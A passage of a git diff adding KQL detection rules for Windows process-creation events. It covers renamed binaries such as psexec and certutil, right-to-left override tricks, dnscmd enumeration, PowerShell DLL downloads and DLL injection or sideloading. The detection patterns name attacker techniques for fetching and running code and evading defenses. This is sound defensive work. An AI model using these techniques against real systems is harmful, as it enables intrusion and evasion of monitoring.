ProcessCommandLine contains "🇼🇫" or ProcessCommandLine contains "🇪🇭" or ProcessCommandLine contains "🇾🇪" or ProcessCommandLine contains "🇿🇲" or ProcessCommandLine contains "🇿🇼🫠" or ProcessCommandLine contains "🫢" or ProcessCommandLine contains "🫣" or ProcessCommandLine contains "🫡" or ProcessCommandLine contains "🫥" or ProcessCommandLine contains "🫤" or ProcessCommandLine contains "🥹" or ProcessCommandLine contains "🫱" or ProcessCommandLine contains "🫱🏻" or ProcessCommandLine contains "🫱🏼" or ProcessCommandLine contains "🫱🏽" or ProcessCommandLine contains "🫱🏾" or ProcessCommandLine contains "🫱🏿" or ProcessCommandLine contains "🫲" or ProcessCommandLine contains "🫲🏻" or ProcessCommandLine contains "🫲🏼" or ProcessCommandLine contains "🫲🏽" or ProcessCommandLine contains "🫲🏾" or ProcessCommandLine contains "🫲🏿" or ProcessCommandLine contains "🫳" or ProcessCommandLine contains "🫳🏻" or ProcessCommandLine contains "🫳🏼" or ProcessCommandLine contains "🫳🏽" or ProcessCommandLine contains "🫳🏾" or ProcessCommandLine contains "🫳🏿" or ProcessCommandLine contains "🫴" or ProcessCommandLine contains "🫴🏻" or ProcessCommandLine contains "🫴🏼" or ProcessCommandLine contains "🫴🏽" or ProcessCommandLine contains "🫴🏾" or ProcessCommandLine contains "🫴🏿" or ProcessCommandLine contains "🫰" or ProcessCommandLine contains "🫰🏻" or ProcessCommandLine contains "🫰🏼" or ProcessCommandLine contains "🫰🏽" or ProcessCommandLine contains "🫰🏾" or ProcessCommandLine contains "🫰🏿" or ProcessCommandLine contains "🫵" or ProcessCommandLine contains "🫵🏻" or ProcessCommandLine contains "🫵🏼" or ProcessCommandLine contains "🫵🏽" or ProcessCommandLine contains "🫵🏾" or ProcessCommandLine contains "🫵🏿" or ProcessCommandLine contains "🫶" or ProcessCommandLine contains "🫶🏻" or ProcessCommandLine contains "🫶🏼" or ProcessCommandLine contains "🫶🏽" or ProcessCommandLine contains "🫶🏾" or ProcessCommandLine contains "🫶🏿" or ProcessCommandLine contains "🤝🏻" or ProcessCommandLine contains "🤝🏼" or ProcessCommandLine contains "🤝🏽" or ProcessCommandLine contains "🤝🏾" or ProcessCommandLine contains "🤝🏿" or ProcessCommandLine contains "🫱🏻‍🫲🏼" or ProcessCommandLine contains "🫱🏻‍🫲🏽" or ProcessCommandLine contains "🫱🏻‍🫲🏾" or ProcessCommandLine contains "🫱🏻‍🫲🏿" or ProcessCommandLine contains "🫱🏼‍🫲🏻" or ProcessCommandLine contains "🫱🏼‍🫲🏽" or ProcessCommandLine contains "🫱🏼‍🫲🏾" or ProcessCommandLine contains "🫱🏼‍🫲🏿" or ProcessCommandLine contains "🫱🏽‍🫲🏻" or ProcessCommandLine contains "🫱🏽‍🫲🏼" or ProcessCommandLine contains "🫱🏽‍🫲🏾" or ProcessCommandLine contains "🫱🏽‍🫲🏿" or ProcessCommandLine contains "🫱🏾‍🫲🏻" or ProcessCommandLine contains "🫱🏾‍🫲🏼" or ProcessCommandLine contains "🫱🏾‍🫲🏽" or ProcessCommandLine contains "🫱🏾‍🫲🏿" or ProcessCommandLine contains "🫱🏿‍🫲🏻" or ProcessCommandLine contains "🫱🏿‍🫲🏼" or ProcessCommandLine contains "🫱🏿‍🫲🏽" or ProcessCommandLine contains "🫱🏿‍🫲🏾" or ProcessCommandLine contains "🫦" or ProcessCommandLine contains "🫅" or ProcessCommandLine contains "🫅🏻" or ProcessCommandLine contains "🫅🏼" or ProcessCommandLine contains "🫅🏽" or ProcessCommandLine contains "🫅🏾" or ProcessCommandLine contains "🫅🏿" or ProcessCommandLine contains "🫃" or ProcessCommandLine contains "🫃🏻" or ProcessCommandLine contains "🫃🏼" or ProcessCommandLine contains "🫃🏽" or ProcessCommandLine contains "🫃🏾" or ProcessCommandLine contains "🫃🏿" or ProcessCommandLine contains "🫄" or ProcessCommandLine contains "🫄🏻" or ProcessCommandLine contains "🫄🏼" or ProcessCommandLine contains "🫄🏽" or ProcessCommandLine contains "🫄🏾" or ProcessCommandLine contains "🫄🏿" or ProcessCommandLine contains "🧌" or ProcessCommandLine contains "🪸" or ProcessCommandLine contains "🪷" or ProcessCommandLine contains "🪹" or ProcessCommandLine contains "🪺" or ProcessCommandLine contains "🫘" or ProcessCommandLine contains "🫗" or ProcessCommandLine contains "🫙" or ProcessCommandLine contains "🛝" or ProcessCommandLine contains "🛞" or ProcessCommandLine contains "🛟" or ProcessCommandLine contains "🪬" or ProcessCommandLine contains "🪩" or ProcessCommandLine contains "🪫" or ProcessCommandLine contains "🩼" or ProcessCommandLine contains "🩻" or ProcessCommandLine contains "🫧" or ProcessCommandLine contains "🪪" or ProcessCommandLine contains "🟰" or ProcessCommandLine contains "😮‍💨" or ProcessCommandLine contains "😵‍💫" or ProcessCommandLine contains "😶‍🌫️" or ProcessCommandLine contains "❤️‍🔥" or ProcessCommandLine contains "❤️‍🩹" or ProcessCommandLine contains "🧔‍♀️" or ProcessCommandLine contains "🧔🏻‍♀️" or ProcessCommandLine contains "🧔🏼‍♀️" or ProcessCommandLine contains "🧔🏽‍♀️" or ProcessCommandLine contains "🧔🏾‍♀️" or ProcessCommandLine contains "🧔🏿‍♀️" or ProcessCommandLine contains "🧔‍♂️" or ProcessCommandLine contains "🧔🏻‍♂️" or ProcessCommandLine contains "🧔🏼‍♂️" or ProcessCommandLine contains "🧔🏽‍♂️" or ProcessCommandLine contains "🧔🏾‍♂️" or ProcessCommandLine contains "🧔🏿‍♂️" or ProcessCommandLine contains "💑🏻" or ProcessCommandLine contains "💑🏼" or ProcessCommandLine contains "💑🏽" or ProcessCommandLine contains "💑🏾" or ProcessCommandLine contains "💑🏿" or ProcessCommandLine contains "💏🏻" or ProcessCommandLine contains "💏🏼" or ProcessCommandLine contains "💏🏽" or ProcessCommandLine contains "💏🏾" or ProcessCommandLine contains "💏🏿" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏿" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏿" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏿" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏿" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏿" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏿" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏿" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏿" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏿" or ProcessCommandLine contains "🧑🏻‍❤️‍🧑🏼" or ProcessCommandLine contains "🧑🏻‍❤️‍🧑🏽" or ProcessCommandLine contains "🧑🏻‍❤️‍🧑🏾" or ProcessCommandLine contains "🧑🏻‍❤️‍🧑🏿" or ProcessCommandLine contains "🧑🏼‍❤️‍🧑🏻" or ProcessCommandLine contains "🧑🏼‍❤️‍🧑🏽" or ProcessCommandLine contains "🧑🏼‍❤️‍🧑🏾" or ProcessCommandLine contains "🧑🏼‍❤️‍🧑🏿" or ProcessCommandLine contains "🧑🏽‍❤️‍🧑🏻" or ProcessCommandLine contains "🧑🏽‍❤️‍🧑🏼" or ProcessCommandLine contains "🧑🏽‍❤️‍🧑🏾" or ProcessCommandLine contains "🧑🏽‍❤️‍🧑🏿" or ProcessCommandLine contains "🧑🏾‍❤️‍🧑🏻" or ProcessCommandLine contains "🧑🏾‍❤️‍🧑🏼" or ProcessCommandLine contains "🧑🏾‍❤️‍🧑🏽" or ProcessCommandLine contains "🧑🏾‍❤️‍🧑🏿" or ProcessCommandLine contains "🧑🏿‍❤️‍🧑🏻" or ProcessCommandLine contains "🧑🏿‍❤️‍🧑🏼" or ProcessCommandLine contains "🧑🏿‍❤️‍🧑🏽" or ProcessCommandLine contains "🧑🏿‍❤️‍🧑🏾" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏻‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏼‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏽‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏾‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👨🏿‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏻‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏼‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏽‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏾‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏻" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏼" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏽" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏾" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👨🏿" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏻" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏼" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏽" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏾" or ProcessCommandLine contains "👩🏿‍❤️‍💋‍👩🏿" or ProcessCommandLine contains "🧑🏻‍❤️‍💋‍🧑🏼" or ProcessCommandLine contains "🧑🏻‍❤️‍💋‍🧑🏽" or ProcessCommandLine contains "🧑🏻‍❤️‍💋‍🧑🏾" or ProcessCommandLine contains "🧑🏻‍❤️‍💋‍🧑🏿" or ProcessCommandLine contains "🧑🏼‍❤️‍💋‍🧑🏻" or ProcessCommandLine contains "🧑🏼‍❤️‍💋‍🧑🏽" or ProcessCommandLine contains "🧑🏼‍❤️‍💋‍🧑🏾" or ProcessCommandLine contains "🧑🏼‍❤️‍💋‍🧑🏿" or ProcessCommandLine contains "🧑🏽‍❤️‍💋‍🧑🏻" or ProcessCommandLine contains "🧑🏽‍❤️‍💋‍🧑🏼" or ProcessCommandLine contains "🧑🏽‍❤️‍💋‍🧑🏾" or ProcessCommandLine contains "🧑🏽‍❤️‍💋‍🧑🏿" or ProcessCommandLine contains "🧑🏾‍❤️‍💋‍🧑🏻" or ProcessCommandLine contains "🧑🏾‍❤️‍💋‍🧑🏼" or ProcessCommandLine contains "🧑🏾‍❤️‍💋‍🧑🏽" or ProcessCommandLine contains "🧑🏾‍❤️‍💋‍🧑🏿" or ProcessCommandLine contains "🧑🏿‍❤️‍💋‍🧑🏻" or ProcessCommandLine contains "🧑🏿‍❤️‍💋‍🧑🏼" or ProcessCommandLine contains "🧑🏿‍❤️‍💋‍🧑🏽" or ProcessCommandLine contains "🧑🏿‍❤️‍💋‍🧑🏾"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_defense_evasion_via_binary_rename.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_via_binary_rename.kql
new file mode 100644
index 00000000..cf1fc9dd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_defense_evasion_via_binary_rename.kql
@@ -0,0 +1,12 @@
+// Title: Potential Defense Evasion Via Binary Rename
+// Author: Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)
+// Date: 2019-06-15
+// Level: medium
+// Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003
+// False Positives:
+//   - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist
+
+DeviceProcessEvents
+| where (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "CONHOST.EXE", "7z.exe", "7za.exe", "WinRAR.exe", "wevtutil.exe", "net.exe", "net1.exe", "netsh.exe", "InstallUtil.exe")) and (not((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7za.exe" or FolderPath endswith "\\WinRAR.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\InstallUtil.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql
new file mode 100644
index 00000000..0505dd7f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql
@@ -0,0 +1,13 @@
+// Title: Potential Defense Evasion Via Rename Of Highly Relevant Binaries
+// Author: Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113
+// Date: 2019-06-15
+// Level: high
+// Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003, car.2013-05-009
+// False Positives:
+//   - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist
+//   - PsExec installed via Windows Store doesn't contain original filename field (False negative)
+
+DeviceProcessEvents
+| where (ProcessVersionInfoFileDescription =~ "Execute processes remotely" or ProcessVersionInfoProductName =~ "Sysinternals PsExec" or (ProcessVersionInfoFileDescription startswith "Windows PowerShell" or ProcessVersionInfoFileDescription startswith "pwsh") or (ProcessVersionInfoOriginalFileName in~ ("certutil.exe", "cmstp.exe", "cscript.exe", "IE4UINIT.EXE", "mshta.exe", "msiexec.exe", "msxsl.exe", "powershell_ise.exe", "powershell.exe", "psexec.c", "psexec.exe", "psexesvc.exe", "pwsh.dll", "reg.exe", "regsvr32.exe", "rundll32.exe", "WerMgr", "wmic.exe", "wscript.exe"))) and (not((FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\ie4uinit.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\psexec.exe" or FolderPath endswith "\\psexec64.exe" or FolderPath endswith "\\PSEXESVC.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_defense_evasion_via_right_to_left_override.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_via_right_to_left_override.kql
new file mode 100644
index 00000000..36d5fd90
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_defense_evasion_via_right_to_left_override.kql
@@ -0,0 +1,13 @@
+// Title: Potential Defense Evasion Via Right-to-Left Override
+// Author: Micah Babinski, @micahbabinski, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2023-02-15
+// Level: high
+// Description: Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.
+// This is used as an obfuscation and masquerading techniques.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.002
+// False Positives:
+//   - Commandlines that contains scriptures such as arabic or hebrew might make use of this character
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\u202e" or ProcessCommandLine contains "[U+202E]"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_discovery_activity_via_dnscmd_exe.kql b/KQL/rules/windows/process_creation/potential_discovery_activity_via_dnscmd_exe.kql
new file mode 100644
index 00000000..ed4a9c0d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_discovery_activity_via_dnscmd_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Discovery Activity Via Dnscmd.EXE
+// Author: @gott_cyber
+// Date: 2022-07-31
+// Level: medium
+// Description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution
+// False Positives:
+//   - Legitimate administration use
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/enumrecords" or ProcessCommandLine contains "/enumzones" or ProcessCommandLine contains "/ZonePrint" or ProcessCommandLine contains "/info") and FolderPath endswith "\\dnscmd.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_dll_file_download_via_powershell_invoke_webrequest.kql b/KQL/rules/windows/process_creation/potential_dll_file_download_via_powershell_invoke_webrequest.kql
new file mode 100644
index 00000000..28c36ac5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_dll_file_download_via_powershell_invoke_webrequest.kql
@@ -0,0 +1,10 @@
+// Title: Potential DLL File Download Via PowerShell Invoke-WebRequest
+// Author: Florian Roth (Nextron Systems), Hieu Tran
+// Date: 2023-03-13
+// Level: medium
+// Description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest or Invoke-RestMethod cmdlets.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.execution, attack.t1059.001, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Invoke-RestMethod " or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "IRM " or ProcessCommandLine contains "IWR ") and (ProcessCommandLine contains "http" and ProcessCommandLine contains "OutFile" and ProcessCommandLine contains ".dll")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_dll_injection_or_execution_using_tracker_exe.kql b/KQL/rules/windows/process_creation/potential_dll_injection_or_execution_using_tracker_exe.kql
new file mode 100644
index 00000000..f6d7fa30
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_dll_injection_or_execution_using_tracker_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential DLL Injection Or Execution Using Tracker.exe
+// Author: Avneet Singh @v3t0_, oscd.community
+// Date: 2020-10-18
+// Level: medium
+// Description: Detects potential DLL injection and execution using "Tracker.exe"
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.001
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " /d " or ProcessCommandLine contains " /c ") and (FolderPath endswith "\\tracker.exe" or ProcessVersionInfoFileDescription =~ "Tracker")) and (not((ProcessCommandLine contains " /ERRORREPORT:PROMPT " or (InitiatingProcessFolderPath endswith "\\Msbuild\\Current\\Bin\\MSBuild.exe" or InitiatingProcessFolderPath endswith "\\Msbuild\\Current\\Bin\\amd64\\MSBuild.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_dll_injection_via_acccheckconsole.kql b/KQL/rules/windows/process_creation/potential_dll_injection_via_acccheckconsole.kql
new file mode 100644
index 00000000..611e3534
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_dll_injection_via_acccheckconsole.kql
@@ -0,0 +1,14 @@
+// Title: Potential DLL Injection Via AccCheckConsole
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-06
+// Level: medium
+// Description: Detects the execution "AccCheckConsole" a command-line tool for verifying the accessibility implementation of an application's UI.
+// One of the tests that this checker can run are called "verification routine", which tests for things like Consistency, Navigation, etc.
+// The tool allows a user to provide a DLL that can contain a custom "verification routine". An attacker can build such DLLs and pass it via the CLI, which would then be loaded in the context of the "AccCheckConsole" utility.
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.threat-hunting
+// False Positives:
+//   - Legitimate use of the UI Accessibility Checker
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -hwnd" or ProcessCommandLine contains " -process " or ProcessCommandLine contains " -window ") and (FolderPath endswith "\\AccCheckConsole.exe" or ProcessVersionInfoOriginalFileName =~ "AccCheckConsole.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_dll_sideloading_via_deviceenroller_exe.kql b/KQL/rules/windows/process_creation/potential_dll_sideloading_via_deviceenroller_exe.kql
new file mode 100644
index 00000000..60eff39e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_dll_sideloading_via_deviceenroller_exe.kql
@@ -0,0 +1,11 @@
+// Title: Potential DLL Sideloading Via DeviceEnroller.EXE
+// Author: @gott_cyber
+// Date: 2022-08-29
+// Level: medium
+// Description: Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll".
+// Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/PhoneDeepLink" and (FolderPath endswith "\\deviceenroller.exe" or ProcessVersionInfoOriginalFileName =~ "deviceenroller.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_dosfuscation_activity.kql b/KQL/rules/windows/process_creation/potential_dosfuscation_activity.kql
new file mode 100644
index 00000000..204f0363
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_dosfuscation_activity.kql
@@ -0,0 +1,10 @@
+// Title: Potential Dosfuscation Activity
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-02-15
+// Level: medium
+// Description: Detects possible payload obfuscation via the commandline
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
